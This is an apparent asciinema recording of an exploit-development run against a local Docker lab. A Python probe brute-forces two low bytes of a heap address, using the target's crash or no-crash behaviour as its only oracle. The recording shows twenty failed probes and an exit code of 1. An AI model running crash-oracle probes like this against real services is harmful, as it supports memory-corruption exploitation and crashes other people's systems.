{"version":3,"term":{"cols":80,"rows":24},"timestamp":1779313913,"command":"python3 tools/no_lfi_heap_oracle_probe.py --target 127.0.0.1:19321 --max-probes 20 --progress-every 1 --recovery-timeout 20","title":"no-LFI heap oracle smoke on local Docker Rift lab","env":{"SHELL":"/opt/homebrew/bin/fish"}}
[0.042, "o", "target        127.0.0.1:19321\r\nprimitive     crash/no-crash only; no LFI; no procfs; no core; no debugger\r\ntarget bytes  2\r\naddress mod   7\r\n\r\n"]
[0.005, "o", "    try=1 low=2721 value=0x2127 rate=1000.00/s\r\n"]
[1.257, "o", "    try=2 low=2f21 value=0x212f rate=1.59/s\r\n"]
[1.259, "o", "    try=3 low=3721 value=0x2137 rate=1.19/s\r\n"]
[1.261, "o", "    try=4 low=4721 value=0x2147 rate=1.06/s\r\n"]
[1.258, "o", "    try=5 low=4f21 value=0x214f rate=0.99/s\r\n"]
[1.255, "o", "    try=6 low=5721 value=0x2157 rate=0.95/s\r\n"]
[1.261, "o", "    try=7 low=5f21 value=0x215f rate=0.93/s\r\n"]
[1.260, "o", "    try=8 low=6721 value=0x2167 rate=0.91/s\r\n"]
[1.251, "o", "    try=9 low=6f21 value=0x216f rate=0.89/s\r\n"]
[1.260, "o", "    try=10 low=7721 value=0x2177 rate=0.88/s\r\n"]
[1.253, "o", "    try=11 low=2724 value=0x2427 rate=0.87/s\r\n"]
[1.258, "o", "    try=12 low=2f24 value=0x242f rate=0.87/s\r\n"]
[1.249, "o", "    try=13 low=3724 value=0x2437 rate=0.86/s\r\n"]
[1.253, "o", "    try=14 low=4724 value=0x2447 rate=0.86/s\r\n"]
[1.259, "o", "    try=15 low=4f24 value=0x244f rate=0.85/s\r\n"]
[1.251, "o", "    try=16 low=5724 value=0x2457 rate=0.85/s\r\n"]
[1.254, "o", "    try=17 low=5f24 value=0x245f rate=0.85/s\r\n"]
[1.261, "o", "    try=18 low=6724 value=0x2467 rate=0.84/s\r\n"]
[1.257, "o", "    try=19 low=6f24 value=0x246f rate=0.84/s\r\n"]
[1.254, "o", "    try=20 low=7724 value=0x2477 rate=0.84/s\r\n"]
[1.256, "o", "\r\ntested        20\r\nno-crash hits 0\r\n"]
[0.018, "x", "1"]
